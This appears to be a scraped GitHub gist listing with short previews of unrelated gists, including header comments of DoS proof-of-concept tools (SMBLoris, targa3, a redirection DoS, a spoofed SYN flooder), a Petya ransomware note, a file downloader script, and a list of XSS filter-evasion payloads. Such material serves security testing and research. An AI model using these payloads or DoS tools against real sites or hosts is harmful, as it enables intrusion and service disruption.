This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
# Decompressor/compressor for files in Mozilla's "mozLz4" format. Firefox uses this file format to | |
# compress e. g. bookmark backups (*.jsonlz4). | |
# | |
# This file format is in fact just plain LZ4 data with a custom header (magic number [8 bytes] and | |
# uncompressed file size [4 bytes, little endian]). | |
# | |
# This Python 3 script requires the LZ4 bindings for Python, see: https://pypi.python.org/pypi/lz4 | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* SMBLoris attack proof-of-concept | |
* | |
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st> | |
* | |
* Licensed under the terms of the 2-clause BSD license. | |
* | |
* This is a proof of concept of a publicly disclosed vulnerability. | |
* Please do not go around randomly DoSing people with it. | |
* | |
* Tips: do not use your local IP as source, or if you do, use iptables to block |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* targa3 - 1999 (c) Mixter <mixter@newyorkoffice.com> | |
* | |
* IP stack penetration tool / 'exploit generator' | |
* Sends combinations of uncommon IP packets to hosts | |
* to generate attacks using invalid fragmentation, protocol, | |
* packet size, header values, options, offsets, tcp segments, | |
* routing flags, and other unknown/unexpected packet values. | |
* Useful for testing IP stacks, routers, firewalls, NIDS, | |
* etc. for stability and reactions to unexpected packets. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* BANG.C Coded by Sorcerer of DALnet | |
* | |
* FUCKZ to: etech, blazin, udp, hybrid and kdl | |
* PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :) | |
* -------------------------------- | |
* REDIRECTION DOS FINALLY DISTRIBUTED !!!!!! | |
* | |
* This is POC and demonstrates a new method of DoS. The idea | |
* behind it is that the attacker generates connection requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Spoofed SYN by eKKiM | |
Educational purpose only please. | |
Compile with | |
gcc syn.c -pthread | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <netinet/tcp.h> | |
#include <netinet/ip.h> |
#petya #petrWrap #notPetya
Win32/Diskcoder.Petya.C Ransomware attack.
Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!
Moved to git repository: https://github.com/denji/golang-tls
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048
# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// httpget.js: download a file (Windows Script Host) | |
// usage: cscript httpget.js <url> <file> | |
(function() { | |
if (WScript.Arguments.Length != 2) { | |
WScript.Echo("Usage: httpget.js <url> <file>") | |
WScript.Quit(1) | |
} | |
var url = WScript.Arguments(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |